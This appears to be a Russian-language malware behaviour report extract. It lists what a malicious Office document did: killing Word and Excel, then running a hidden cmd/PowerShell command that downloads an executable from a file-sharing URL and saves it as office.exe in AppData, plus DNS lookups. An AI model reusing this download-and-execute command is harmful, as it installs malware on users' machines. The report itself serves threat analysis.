Техническая информация
- “https://cl.ly/2g2d2d1x2a3o/download/tmp745.exe как “%appdata%\office.exe
- '<SYSTEM32>\taskkill.exe' /F /IM WINWORD.EXE
- '<SYSTEM32>\taskkill.exe' /F /IM EXCEL.EXE
- '<SYSTEM32>\cmd.exe' /C "CMD /C TASKKILL /F /IM WINWORD.EXE & TASKKILL /F /IM EXCEL.EXE & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://cl.ly/2g2d2d1x2a3O/download/tmp745.exe”, “%APpdATa%\offic...
- http://x.##2.us/x.cer
- DNS ASK cl.ly
- DNS ASK x.##2.us
- DNS ASK ap#.cld.me
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /C "CMD /C TASKKILL /F /IM WINWORD.EXE & TASKKILL /F /IM EXCEL.EXE & PowerShell (New-Object System.Net.WebClient).DownloadFile(“https://cl.ly/2g2d2d1x2a3O/download/tmp745.exe”, “%APpdATa%\offic...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C TASKKILL /F /IM WINWORD.EXE